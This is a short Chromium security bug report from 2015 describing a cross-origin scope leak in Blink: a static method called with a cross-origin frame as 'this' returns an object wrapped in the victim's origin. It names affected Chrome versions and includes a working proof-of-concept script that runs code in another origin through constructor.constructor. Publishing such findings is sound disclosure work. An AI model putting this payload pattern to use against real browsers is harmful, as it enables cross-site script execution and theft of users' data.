Reported by mailto:[email protected], May 31 2015
Calling an object-returning static method with a cross-origin thing passed as |this| yields an object wrapped in the cross-origin scope. This is because FunctionCallbackInfo ends up with a cross-origin holder, and the holder acts as a creation context for the return value in blink::ScriptWrappable::wrap.
Chrome 43.0.2357.81 (Release) Chrome 44.0.2403.18 (Beta) Chrome 45.0.2414.0 (Dev) Chromium 45.0.2419.0 compiled today
<script>
var i = document.documentElement.appendChild(document.createElement('iframe'));
i.onload = function() {
IDBKeyRange.only.call(frames[0],0).constructor.constructor('alert(location)')();
}
i.src = 'data:text/html,victim';
</script>Link: https://bugs.chromium.org/p/chromium/issues/detail?id=494640